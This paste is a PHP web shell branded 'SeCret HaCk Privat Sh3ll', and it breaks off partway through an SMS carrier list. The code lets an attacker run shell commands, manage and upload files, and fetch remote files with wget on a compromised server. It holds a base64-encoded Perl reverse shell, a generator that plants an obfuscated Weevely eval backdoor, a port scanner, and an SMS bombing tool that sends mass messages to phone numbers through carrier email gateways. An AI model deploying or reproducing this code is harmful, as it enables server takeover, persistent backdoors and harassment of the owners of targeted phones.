· 9 years ago · Mar 07, 2017, 11:34 PM
1<html>
2<body>
3<?php
4 $head = '
5<html>
6<head>
7</script>
8<title>SeCret HaCk Privat Sh3ll </title>
9<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
10
11<STYLE>
12body {
13 background-repeat: repeat-x repeat-y;
14 background-position: left top;
15 font-size: 14px;
16 background-attachment: fixed;
17font-family: sans;
18color: red;
19margin:0px 0px 0px 0px;
20}
21font-family: Courier New
22}
23tr {
24BORDER: line 1px #333;
25color: #FFF;
26}
27td {
28BORDER: line 1px #333;
29color: #FFF;
30}
31.table1 {
32BORDER: 0px Black;
33BACKGROUND-COLOR: Black;
34color: #FFF;
35}
36.td1 {
37BORDER: 0px;
38BORDER-COLOR: #333333;
39font: 7pt Verdana;
40color: Green;
41}
42.tr1 {
43BORDER: 0px;
44BORDER-COLOR: #333333;
45color: #FFF;
46}
47table {
48BORDER: line 1px #333;
49BORDER-COLOR: #333333;
50BACKGROUND-COLOR: Black;
51color: #FFF;
52}
53input {
54border : line 1px;
55border-color : #333;
56BACKGROUND-COLOR: #111111;
57font: 9pt Verdana;
58color: Red;
59}
60select {
61BORDER-RIGHT: Black 1px solid;
62BORDER-TOP: #DF0000 1px solid;
63BORDER-LEFT: #DF0000 1px solid;
64BORDER-BOTTOM: Black 1px solid;
65BORDER-color: #FFF;
66BACKGROUND-COLOR: #111111;
67font: 8pt Verdana;
68color: Red;
69}
70submit {
71BORDER: buttonhighlight 2px outset;
72BACKGROUND-COLOR: #111111;
73width: 30%;
74color: #FFF;
75}
76textarea {
77border : line 1px #333;
78BACKGROUND-COLOR: #111111;
79font: Fixedsys bold;
80color: #999;
81}
82BODY {
83 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
84margin: 1px;
85color: Red;
86background-color: #111111;
87}
88.main {
89margin : -287px 0px 0px -490px;
90BORDER: line 1px #333;
91BORDER-COLOR: #333333;
92}
93.tt {
94background-color: transparent;
95}
96
97A:link {
98 COLOR: White; TEXT-DECORATION: none
99}
100A:visited {
101 COLOR: White; TEXT-DECORATION: none
102}
103A:hover {
104 color: Red; TEXT-DECORATION: none
105}
106A:active {
107 color: Red; TEXT-DECORATION: none
108}
109</STYLE>
110<script language=\'javascript\'>
111function hide_div(id)
112{
113 document.getElementById(id).style.display = \'none\';
114 document.cookie=id+\'=0;\';
115}
116function show_div(id)
117{
118 document.getElementById(id).style.display = \'block\';
119 document.cookie=id+\'=1;\';
120}
121function change_divst(id)
122{
123 if (document.getElementById(id).style.display == \'none\')
124 show_div(id);
125 else
126 hide_div(id);
127}
128</script>'; ?>
129<?php
130
131//Secret HaCk ::SDN:: Was Here (^_^)
132
133error_reporting(0);
134#chdir('');
135//Some basic var's
136if (!@$_GET['path']) {
137 $dir = CleanDir(getcwd());
138} else {
139 $dir = CleanDir($_GET['path']);
140}
141$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
142$domain = $_SERVER['HTTP_HOST'];
143$script = $_SERVER['SCRIPT_NAME'];
144$full_url = $_SERVER['REQUEST_URI'];
145$script2 = basename($script);
146$serverip = $_SERVER['SERVER_ADDR'];
147$userip = $_SERVER['REMOTE_ADDR'];
148$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
149$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
150$disabled = ini_get('disable_functions');
151//Perl back connect script by secret Hack
152//Encoded in base64 for convenience
153$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
154@ini_set("memory_limit", "9999M");
155@ini_set("max_execution_time", "0");
156@ini_set("upload_max_filesize", "9999m");
157@ini_set("magic_quotes_gpc", "0");
158@set_magic_quotes_runtime(0);
159set_time_limit(0);
160if (empty($disabled)) {
161 $disabled = "None";
162}
163//Some functions
164function CleanDir($directory) {
165 $directory = str_replace("\\", "/", $directory);
166 $directory = str_replace("//", "/", $directory);
167 return $directory;
168}
169function success($for, $var1) {
170 $domain = $_SERVER['HTTP_HOST'];
171 $script = $_SERVER['SCRIPT_NAME'];
172 $full_url = $_SERVER['REQUEST_URI'];
173 if ($for == "filesave") {
174 $message = "File Saved!";
175 $redirect = "http://$domain$script?path=$var1";
176 }
177 if ($for == "filedelete") {
178 $message = "File Deleted!";
179 $redirect = "http://$domain$script?path=$var1";
180 }
181 if ($for == "createdir") {
182 $message = "Directory Created!";
183 $redirect = "http://$domain$script?path=$var1";
184 }
185 if ($for == "dir_exists") {
186 $message = "Directory Already Exists!";
187 $redirect = "http://$domain$script?path=$var1";
188 }
189 if ($for == "file_exists") {
190 $message = "File Already Exists!";
191 $redirect = "http://$domain$script?editfile=$var1";
192 }
193 if ($for == "file_created") {
194 $message = "File Created!";
195 $redirect = "http://$domain$script?editfile=$var1";
196 }
197 if ($for == "file_uploaded") {
198 $message = "File Uploaded!";
199 $redirect = "http://$domain$full_url";
200 }
201 if ($for == "shell_killed") {
202 $message = "Secret Hack has Killed the Shell !!!";
203 $redirect = "http://$domain$script";
204 }
205 if ($for == "dir_del") {
206 $message = "Directory Deleted!";
207 $redirect = "http://$domain$script?path=$var1";
208 }
209 if ($for == "dir_renamed") {
210 $message = "Directory Renamed!";
211 $redirect = "http://$domain$script?path=$var1";
212 }
213 if ($for == "file_renamed") {
214 $message = "File Renamed!";
215 $redirect = "http://$domain$script?path=$var1";
216 }
217 if ($for == "configs_found") {
218 $message = "$var1 Configs Found!";
219 $redirect = "";
220 }
221 if ($for == "unzip") {
222 $message = "Successfully Unziped File!";
223 $redirect = "http://$domain$script?path=$var1";
224 }
225 if ($for == "files_found") {
226 $message = "$var1 files found!";
227 $redirect = "";
228 }
229 if ($for == "weevely") {
230 $message = "Secret Hack Has installed Weevely BackDoor for u :3 ";
231 $redirect = "";
232 }
233 echo "<div id='xbox'><embed
234 src='http://p0wersurge.com/js/achievementnopic.swf'
235 width='300'
236 height='80'
237 flashvars='Text=$message&gs=1337'
238 wmode='transparent'/></div>";
239 if (empty($redirect)) {
240 echo "<script>
241function remove (){
242 document.getElementById('xbox').innerHTML='';
243}
244setInterval(function(){remove();}, 2700);
245</script>";
246 } else {
247 echo "<script>
248function remove (){
249 window.location = '$redirect'
250}
251setInterval(function(){remove();}, 2500);
252</script>";
253 }
254}
255function error($mesg) {
256 $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
257 echo "$error";
258}
259function ByteConversion($bytes, $precision = 2) {
260 $kilobyte = 1024;
261 $megabyte = $kilobyte * 1024;
262 $gigabyte = $megabyte * 1024;
263 $terabyte = $gigabyte * 1024;
264 if (($bytes >= 0) && ($bytes < $kilobyte)) {
265 return $bytes . ' B';
266 } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
267 return round($bytes / $kilobyte, $precision) . ' KB';
268 } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
269 return round($bytes / $megabyte, $precision) . ' MB';
270 } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
271 return round($bytes / $gigabyte, $precision) . ' GB';
272 } elseif ($bytes >= $terabyte) {
273 return round($bytes / $terabyte, $precision) . ' TB';
274 } else {
275 return $bytes . ' B';
276 }
277}
278//Mass File Function :: Secret Hack Was here :: don't steal this codes :3 :(
279function files($mass_dir) {
280 if ($dh = opendir($mass_dir)) {
281 $files = array();
282 $inner_files = array();
283 while ($file = readdir($dh)) {
284 if ($file != "." && $file != ".." && $file[0] != '.') {
285 if (is_dir($mass_dir . "/" . $file)) {
286 $inner_files = files("$mass_dir/$file");
287 if (is_array($inner_files)) $files = array_merge($files, $inner_files);
288 } else {
289 array_push($files, "$mass_dir/$file");
290 }
291 }
292 }
293 closedir($dh);
294 return $files;
295 }
296}
297//Upload File
298if (isset($_POST['do_upload_file'])) {
299 $udir = $_POST['upload_location'];
300 $uname = $_FILES['upload_file']['name'];
301 $both = "$udir$uname";
302 if (file_exists($both)) {
303 success("file_exists", $both);
304 } else {
305 switch ($_FILES['upload_file']['error']) {
306 case 0:
307 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
308 success("file_uploaded");
309 } else {
310 error("Failed To Upload File!");
311 }
312 }
313 }
314}
315//wget file
316if (isset($_POST['do_wget_file'])) {
317 $wget_file = $_POST['wget_file'];
318 $wecmd = "wget $wget_file";
319 $wget_ecmd = cmd2($wecmd, $dir);
320 echo "<center><font color='#14ab00'>
321Result:<br>
322<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
323$wget_ecmd
324</textarea></font></center><br><br>";
325}
326//Execute command
327function cmd2($cmd, $path) {
328 chdir($path);
329 $disabled = ini_get('disable_functions');
330 if (empty($disabled)) {
331 $disabled = "None";
332 }
333 if ($disabled == "None") {
334 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
335 while (!feof($io[1])) {
336 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
337 }
338 while (!feof($io[2])) {
339 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
340 }
341 fclose($io[1]);
342 fclose($io[2]);
343 proc_close($execute);
344 return $res;
345 } elseif (function_exists("proc_open")) {
346 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
347 while (!feof($io[1])) {
348 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
349 }
350 while (!feof($io[2])) {
351 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
352 }
353 fclose($io[1]);
354 fclose($io[2]);
355 proc_close($execute);
356 return $res;
357 } elseif (function_exists("exec")) {
358 $res = exec($cmd);
359 return $res;
360 } elseif (function_exists("system")) {
361 $res = system($cmd);
362 return $res;
363 } elseif (function_exists("shell_exec")) {
364 $res = shell_exec($cmd);
365 return $res;
366 } elseif (function_exists("passthru")) {
367 $res = passthru($cmd);
368 return $res;
369 } else {
370 error("The necessary functions to execute commands are disabled!");
371 }
372}
373//Unzip function
374function unzip($filename, $directory) {
375 $zip = new ZipArchive;
376 $res = $zip->open($filename);
377 if ($res === TRUE) {
378 $zip->extractTo($directory);
379 $zip->close();
380 success("unzip", $directory);
381 } else {
382 cmd2("unzip $filename", $directory);
383 }
384}
385//Get files and directories and throw them into an array.
386$open = opendir($dir);
387$files = array();
388$direcs = array();
389while ($file = readdir($open)) {
390 if ($file != "." && $file != "..") {
391 if (is_dir("$dir/$file")) {
392 array_push($direcs, $file);
393 } else {
394 array_push($files, $file);
395 }
396 }
397}
398asort($direcs);
399asort($files);
400?>
401<html>
402<head>
403
404</head>
405<body bgcolor="black"><body bgcolor="black">
406<center>
407<table border=1 width=100%><td width=15% align=right><font color=red size=2 face="comic sans ms">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=2>".php_uname() ;?> <br><?php echo "<font size=2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none'; echo $r;?>
408</table><?php echo $head ; ?><table width=100%><tr><td align=center width=60%>
409</table>
410<div id="menu">
411<a href="<?php echo '?'?>"><font size=4 face="Wallpoet" color=white> [Home] </font></a>
412<a href="<?php echo '?perlbackconnect';?>"><font size=4 face="Wallpoet" color=red> [Perl Back Connect] </font></a>
413<a href="<?php echo '?pythonbackconnect'?>"><font size=4 face="Wallpoet" color=white> [Python Back connect] </font></a>
414<a href="<?php echo '?encrypt';?>"><font size=4 face="Wallpoet" color=red> [Encrypt] </font></a>
415<a href="<?php echo '?massdeface'?>"><font size=4 face="Wallpoet" color=white> [Mass Deface] </font></a>
416<a href="<?php echo '?massinfect';?>"><font size=4 face="Wallpoet" color=red> [Mass File Infect] </font></a>
417<a href="<?php echo '?installMySQL'?>"><font size=4 face="Wallpoet" color=white> [Install MSD] </font></a>
418<p></p>
419<a href="<?php echo '?sms';?>"><font size=4 face="Wallpoet" color=red> [ Sender] </font></a>
420<a href="<?php echo '?domaininfo'?>"><font size=4 face="Wallpoet" color=white> [Reverse IP] </font></a>
421<a href="<?php echo '?weev';?>"><font size=4 face="Wallpoet" color=red> [Weevely Backdoor] </font></a>
422<a href="<?php echo '?scan'?>"><font size=4 face="Wallpoet" color=white> [Port Scan] </font></a>
423
424
425</div>
426<p></p>
427<p></p>
428<p></p>
429<?php
430if (isset($_GET['encrypt'])) {
431 echo "<form action='' method='post'>
432<center><font color='#14ab00'>
433<input type='text' name='en_string' class='text'>
434<input type='submit' name='do_encrypt' value='Encrypt String'>
435</form>
436</font></center>";
437}
438if (isset($_POST['do_encrypt'])) {
439 $vbsalt = gen_salt("30");
440 $vbsalt2 = gen_salt("3");
441 $mybbsalt = gen_salt("8");
442 $ipbsalt = gen_salt("5");
443 $joomlasalt = gen_salt("32");
444 $password = $_POST['en_string'];
445 $md5 = md5($password);
446 $md52 = md5(md5($password));
447 $md53 = md5(md5(md5($password)));
448 $sha1 = sha1($password);
449 $sha256 = hash('sha256', $password);
450 $vbalg = md5(md5($password) . $vbsalt);
451 $vbalg2 = md5(md5($password) . $vbsalt2);
452 $mybbalg = md5(md5($mybbsalt) . $password);
453 $ipbalg = md5(md5($ipbsalt) . md5($password));
454 $joomlaalg = md5($password . $joomlasalt);
455 $en_result = "Hashes for string: $password\nMD5: $md5\nmd5(md5(pass)): $md52\nmd5(md5(md5(pass))): $md53\nSHA-1: $sha1\nSHA-256: $sha256\nvBulletin 4: $vbalg:$vbsalt\nvBulletin 3: $vbalg2:$vbsalt2\nMyBB: $mybbalg:$mybbsalt\nIPB: $ipbalg:$ipbsalt\nJoomla 1.0.13+: $joomlaalg:$joomlasalt\n";
456 echo "<center>
457<textarea rows='20' cols='150' style='color:#00ff00'>
458$en_result
459</textarea>
460</center><br>";
461}
462?>
463<?php
464//Port scan
465if (isset($_GET['scan'])) {
466 echo "<center><font color='#14ab00' size='3'>
467Port Scan:<br>
468<form action='' method='post'>
469Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
470Start port: <input type='text' name='start_port' class='text' size='6'>
471End port: <input type='text' name='end_port' class='text' size='7'><br>
472<input type='submit' name='start_scan' value='Scan'>
473</form>
474</font>
475</center>";
476}
477if (isset($_POST['start_scan'])) {
478 $scanhost = $_POST['scan_host'];
479 $startport = $_POST['start_port'];
480 $endport = $_POST['end_port'];
481 while ($startport <= $endport) {
482 if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
483 echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
484 } else {
485 echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
486 }
487 $startport++;
488 }
489}
490?>
491<?php
492//Edit file stuff
493if (!empty($_GET['editfile'])) {
494 $edfile = $_GET['editfile'];
495 $redirectloc = dirname($edfile);
496 echo "<form method='POST'><center>";
497 if (file_exists($edfile)) {
498 if (get_magic_quotes_gpc()) {
499 $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
500 } else {
501 $file_content = htmlspecialchars(file_get_contents($edfile));
502 }
503 if (is_writeable($edfile)) {
504 echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#00ff00'>$file_content</textarea>
505<br><br>
506 <input type='submit' name='savedit' value='Save' />
507 <input type='submit' name='deletefile' value='Delete' />
508 </form></center>";
509 if (isset($_POST['savedit'])) {
510 if (get_magic_quotes_gpc()) {
511 $edfilecontent = stripslashes($_POST['edfile_contents']);
512 } else {
513 $edfilecontent = $_POST['edfile_contents'];
514 }
515 if (file_put_contents($edfile, $edfilecontent)) {
516 success("filesave", rtrim($redirectloc, "/"));
517 } else {
518 error("Failed to save file!");
519 }
520 } else if (isset($_POST['deletefile'])) {
521 if (unlink($edfile)) {
522 success("filedelete", rtrim($redirectloc, '/'));
523 } else {
524 error("Failed to delete file!");
525 }
526 }
527 } else {
528 echo "<font color='red'><b>File is read only!</b></font><br>
529<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
530 }
531 echo "</center>";
532 } else {
533 echo "<form method='POST'><center>";
534 echo "<font color='red'><b>File does not exist!</b></font><br>
535<textarea rows='20' cols='150' name='newfile_contents' style='color:#00ff00'>
536</textarea><br><br>
537 <input type='submit' name='savefile' value='Create File' /><br /><br />
538 </form></center>";
539 if (isset($_POST['savefile'])) {
540 if (get_magic_quotes_gpc()) {
541 $newfilecontent = stripslashes($_POST['newfile_contents']);
542 } else {
543 $newfilecontent = $_POST['newfile_contents'];
544 }
545 if (file_put_contents($edfile, $newfilecontent)) {
546 success("filesave", rtrim($redirectloc, "/"));
547 } else {
548 error("Failed to save file!");
549 }
550 }
551 }
552}
553?>
554<?php
555//Weevely backdoor
556if (isset($_GET['weev'])) {
557 echo "<center><font color='#14ab00' size='3'>
558<form action='' method='post'>
559Directory to install weevely backdoor:<br>
560<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
561Name of file (something .php):<br>
562<input type='text' name='weev_name' class='text' value='weevely.php'><br>
563Password (more than 3 characters):<br>
564<input type='text' name='weev_pass' class='text'><br>
565<input type='submit' name='install_weev' value='BackDoor'><br>
566</font>
567</center>";
568}
569if (isset($_POST['install_weev'])) {
570 $weevdir = rtrim($_POST['weev_dir'], '/');;
571 $weevname = $_POST['weev_name'];
572 $weevpassword = $_POST['weev_pass'];
573 if (strlen($weevpassword) < 3) {
574 error("Password must be longer than 3 characters!");
575 } else {
576 $first2 = $weevpassword[0] . $weevpassword[1];
577 $rest = substr($weevpassword, 2);
578 $money = "$";
579 $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
580 $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
581 $weevelybd3 = "$money" . "k='$rest';";
582 $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
583 $all = "<?php\neval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));\n?>";
584 if (file_put_contents($weevdir . '/' . $weevname, $all)) {
585 echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
586 success("weevely");
587 } else {
588 error("Failed to write backdoor to $weevdir");
589 }
590 }
591}
592?>
593<?php
594//Domain information
595//Get domains hosted on server from yougetsignal.com
596//Secret Hack was here
597if (isset($_GET['domaininfo'])) {
598 echo "<font color='#14ab00' size='3'>";
599 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
600 $num = 0;
601 $count = sizeof($dns_record);
602 echo "<br></b><br>";
603 while ($num < $count) {
604 $name_servers = $dns_record[$num];
605 $name_servers2 = $name_servers['type'];
606 $name_servers3 = @$name_servers['target'];
607 $num++;
608 if ($name_servers2 == "NS") {
609 echo "$name_servers3<br>";
610 $nshost = @$name_servers['host'];
611 }
612 if ($name_servers2 == "SOA") {
613 $nsemail = $name_servers['rname'];
614 }
615 if ($name_servers2 == "A") {
616 $nsip = $name_servers['ip'];
617 }
618 }
619 $num = 0;
620 echo "<br><table class='noborder'>
621</table><br>";
622 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
623 $status = $domains_on_server->status;
624 $message = $domains_on_server->message;
625 $domainAr = $domains_on_server->domainArray;
626 $num_of_site = $domains_on_server->domainCount;
627 $count = sizeof($domainAr);
628 if ($status == "Success") {
629 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
630 while ($num < $count) {
631 $hossites = $domainAr[$num];
632 $num++;
633 $hossites3 = $domainAr[$num];
634 $hossites3 = $hossites3[0];
635 $hossites = $hossites[0];
636 $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
637 $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
638 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
639 $num++;
640 }
641 echo "</table><br>";
642 $num = 0;
643 } else {
644 error("Iam not Happy because i Failed to find or get sites hosted on same server from: <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
645 }
646 echo "</font><br>";
647}
648?>
649<?php
650//SMS Bomber stuff
651if (isset($_POST['do_bomb_sms'])) {
652 $phonenum = $_POST['phnumber'];
653 $carrier = $_POST['carrier'];
654 $amount = $_POST['numberof'];
655 $from = $_POST['from'];
656 $headers = "From: $from\r\n";
657 $headers.= 'MIME-Version: 1.0' . "\n";
658 $headers.= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
659 $subject = $_POST['subject'];
660 $to = "$phonenum$carrier";
661 $numsent = 0;
662 $sent_fail = 0;
663 $sent_success = 0;
664 $msgcontent = $_POST['message_content'];
665 if (empty($phonenum) OR empty($amount) OR empty($from) OR empty($subject) OR empty($msgcontent)) {
666 error("All Fields Must Entered!");
667 } else {
668 while ($numsent < $amount) {
669 if (!@mail($to, $subject, $msgcontent, $headers)) {
670 $numsent++;
671 $sent_fail++;
672 } else {
673 $numsent++;
674 $sent_success++;
675 }
676 }
677 echo "<font color='#14ab00'>Successfully sent $sent_success messages.<br>
678Failed to send $sent_fail messages.<br>";
679 }
680}
681if (isset($_GET['sms'])) {
682 echo "<font color='#14ab00'>
683<table class='noborder'>
684<tr>
685<form action='' method='post'>
686<td>Phone Number With Area Code</td>
687<td><input type='text' name='phnumber' class='text'></td>
688</tr>
689<tr>
690<td>Carrier:</td>
691<td>
692<select name='carrier'>
693<option value='@sms.3rivers.net'>3 River Wireless</option>
694<option value='@paging.acswireless.com'>ACS Wireless</option>
695<option value='@advantagepaging.com'>Advantage Communications</option>
696<option value='@airtelkk.com'>Airtel (Karnataka, India)</option>
697<option value='@sms.airtelmontana.com'>Airtel Wireless (Montana, USA)</option>
698<option value='@airtouch.net'>Airtouch Pagers</option>
699<option value='@airtouchpaging.com'>Airtouch Pagers</option>
700<option value='@alphapage.airtouch.com'>Airtouch Pagers</option>
701<option value='@myairmail.com'>Airtouch Pagers</option>
702<option value='@msg.acsalaska.com'>Alaska Communications Systems</option>
703<option value='@message.alltel.com'>Alltel</option>
704<option value='@alphanow.net'>AlphaNow</option>
705<option value='@page.americanmessaging.net'>American Messaging</option>
706<option value='@clearpath.acswireless.com'>Ameritech Clearpath</option>
707<option value='@paging.acswireless.com'>Ameritech Paging</option>
708<option value='@pageapi.com'>Ameritech Paging</option>
709<option value='@airtelap.com'>Andhra Pradesh Airtel</option>
710<option value='@text.aql.com'>Aql</option>
711<option value='@archwireless.net'>Arch Pagers (PageNet)</option>
712<option value='@epage.arch.com'>Arch Pagers (PageNet)</option>
713<option value='@mobile.att.net'>AT&T</option>
714<option value='@txt.att.net'>AT&T2</option>
715<option value='@page.att.net'>AT&T Enterprise Paging</option>
716<option value='@mmode.com'>AT&T Free2Go</option>
717<option value='@mobile.att.net'>AT&T PCS</option>
718<option value='@dpcs.mobile.att.net'>AT&T Pocketnet PCS</option>
719<option value='@sms.beemail.ru'>BeeLine GSM</option>
720<option value='@beepwear.net'>Beepwear</option>
721<option value='@message.bam.com'>Bell Atlantic</option>
722<option value='@bellmobility.ca'>Bell Canada</option>
723<option value='@txt.bellmobility.ca'>Bell Canada2</option>
724<option value='@txt.bell.ca'>Bell Mobility (Canada)</option>
725<option value='@bellsouth.cl'>Bell South</option>
726<option value='@blsdcs.net'>Bell South2</option>
727<option value='@sms.bellsouth.com'>Bell South3</option>
728<option value='@wireless.bellsouth.com'>Bell South4</option>
